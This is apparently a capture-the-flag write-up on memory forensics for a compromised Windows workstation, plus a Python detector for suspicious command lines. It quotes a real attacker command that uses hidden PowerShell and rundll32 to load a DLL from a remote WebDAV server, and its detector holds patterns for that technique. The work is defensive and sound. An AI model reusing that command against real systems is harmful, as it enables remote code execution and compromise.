Scenario

You are a forensic investigator at a financial institution, and your SIEM flagged unusual activity on a workstation with access to sensitive financial data. Suspecting a breach, you received a memory dump from the compromised machine. Your task is to analyze the memory for signs of compromise, trace the anomaly's origin, and assess its scope to contain the incident effectively.

https://cyberdefenders.org/blueteam-ctf-challenges/reveal/


1- Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

powershell.exe

First we determine whether the memory dump was taken from a Windows or Linux system. Running the windows.info plugin (Volatility 3) is the quick check: if it returns valid kernel and build information, the image is a Windows dump.

Screenshot 2025-09-01 035942.png

Once we have confirmed it is Windows, we use the pstree plugin (windows.pstree) to display the process tree and look for the malicious process.

Screenshot 2025-09-01 040048.png

Screenshot 2025-09-01 042459.png

We identified a suspicious process, powershell.exe, and confirmed it by reviewing the command line used to launch it (the cmdline plugin, windows.cmdline):

powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry

The command runs PowerShell with a hidden window, maps a WebDAV share hosted on 45.9.74.32 on port 8888 (the @8888 suffix in the UNC path is the WebDAV port syntax), and then uses rundll32 to load 3435.dll straight from that remote share and call its exported function named entry. A DLL executed from an attacker-controlled WebDAV server is a clear sign of compromise.

2- Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

4120

Screenshot 2025-09-01 040145.png

The answer is visible in the pstree screenshot from the previous question: the PPID column for the malicious powershell.exe process shows 4120.
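The two steps above (spotting the malicious process from its command line, then reading its parent PID from the process tree) can be automated over the plugin output. The script below is an added example, not part of the original writeup or of Volatility; it parses constructed text shaped like windows.pstree and windows.cmdline output (trimmed to the relevant columns, with invented PIDs except for the parent PID 4120 taken from the answer), flags command lines that combine a hidden PowerShell window, net use, and rundll32 loading a DLL from a WebDAV UNC path, and reports each hit with its PPID and ancestry chain.

```python
import re
from typing import Dict, List

# Constructed sample output mimicking Volatility 3 windows.pstree, reduced to
# PID / PPID / ImageFileName. Leading '*' marks depth in the tree. PIDs other
# than the malicious process's parent (4120, from the writeup) are invented.
PSTREE_SAMPLE = """\
PID\tPPID\tImageFileName
4\t0\tSystem
* 412\t4\tsmss.exe
4120\t3904\texplorer.exe
* 5684\t4120\tpowershell.exe
** 6120\t5684\tnet.exe
** 6332\t5684\trundll32.exe
"""

# Constructed sample mimicking windows.cmdline (PID / Process / Args).
CMDLINE_SAMPLE = """\
PID\tProcess\tArgs
4\tSystem\t
4120\texplorer.exe\tC:\\Windows\\Explorer.EXE
5684\tpowershell.exe\tpowershell.exe -windowstyle hidden net use \\\\45.9.74.32@8888\\davwwwroot\\ ; rundll32 \\\\45.9.74.32@8888\\davwwwroot\\3435.dll,entry
6332\trundll32.exe\trundll32 \\\\45.9.74.32@8888\\davwwwroot\\3435.dll,entry
"""

# \\<ipv4>@<port>\davwwwroot\<path> : the WebDAV UNC form seen in the command line.
WEBDAV_UNC = re.compile(
    r"\\\\(\d{1,3}(?:\.\d{1,3}){3})@(\d{1,5})\\davwwwroot\\([^\s;,]*)", re.IGNORECASE
)


def parse_pstree(text: str) -> Dict[int, dict]:
    """Map PID -> {ppid, name, depth} from pstree-style output."""
    procs: Dict[int, dict] = {}
    for line in text.splitlines()[1:]:  # skip header
        if not line.strip():
            continue
        depth = len(line) - len(line.lstrip("*"))
        pid_s, ppid_s, name = line.lstrip("* ").split("\t")[:3]
        procs[int(pid_s)] = {"ppid": int(ppid_s), "name": name.strip(), "depth": depth}
    return procs


def parse_cmdline(text: str) -> Dict[int, str]:
    """Map PID -> argument string from cmdline-style output."""
    args: Dict[int, str] = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        parts = line.split("\t", 2)
        args[int(parts[0])] = parts[2] if len(parts) > 2 else ""
    return args


def webdav_indicators(args: str) -> dict:
    """Collect suspicious traits of one command line and any WebDAV remotes it references."""
    hits: List[str] = []
    if re.search(r"-w[a-z]*\s+hidden", args, re.IGNORECASE):
        hits.append("PowerShell launched with a hidden window")
    if re.search(r"\bnet\s+use\b", args, re.IGNORECASE):
        hits.append("net use mapping a remote share")
    if re.search(r"\brundll32\b.*?\\\\", args, re.IGNORECASE):
        hits.append("rundll32 loading a DLL from a UNC path")
    remotes = []
    for host, port, path in WEBDAV_UNC.findall(args):
        remotes.append({"host": host, "port": int(port), "path": path})
        if path.lower().endswith(".dll"):
            hits.append(f"DLL {path} fetched over WebDAV from {host}:{port}")
    return {"indicators": hits, "remotes": remotes}


def ancestry(pstree: Dict[int, dict], pid: int) -> List[str]:
    """Walk PPIDs upward; stops at an exited/unknown parent or a cycle."""
    chain, seen = [], set()
    while pid in pstree and pid not in seen:
        seen.add(pid)
        chain.append(f"{pstree[pid]['name']}({pid})")
        pid = pstree[pid]["ppid"]
    return list(reversed(chain))


def find_suspicious(pstree: Dict[int, dict], cmdline: Dict[int, str], min_hits: int = 2) -> List[dict]:
    """Return processes whose command line shows at least min_hits indicators, with PPID and chain."""
    findings = []
    for pid, args in cmdline.items():
        info = webdav_indicators(args)
        if len(info["indicators"]) < min_hits:
            continue
        proc = pstree.get(pid, {})
        ppid = proc.get("ppid")
        findings.append({
            "pid": pid,
            "name": proc.get("name"),
            "ppid": ppid,
            "parent": pstree.get(ppid, {}).get("name"),
            "chain": ancestry(pstree, pid),
            **info,
        })
    return findings


if __name__ == "__main__":
    tree = parse_pstree(PSTREE_SAMPLE)
    for f in find_suspicious(tree, parse_cmdline(CMDLINE_SAMPLE)):
        print(f"{f['name']} PID {f['pid']} PPID {f['ppid']} ({f['parent']})")
        print("  chain:", " -> ".join(f["chain"]))
        for ind in f["indicators"]:
            print("  -", ind)
```

Against real plugin output, pipe `vol -f <dump> windows.pstree` and `windows.cmdline` to files and feed them to the parsers; the column layout in the real output is wider, so adjust the split to the columns you kept. The threshold of two indicators keeps a lone `net use` from a user mapping a legitimate share from being flagged, while the full chain (hidden window, net use, rundll32 from UNC, DLL on WebDAV) scores four.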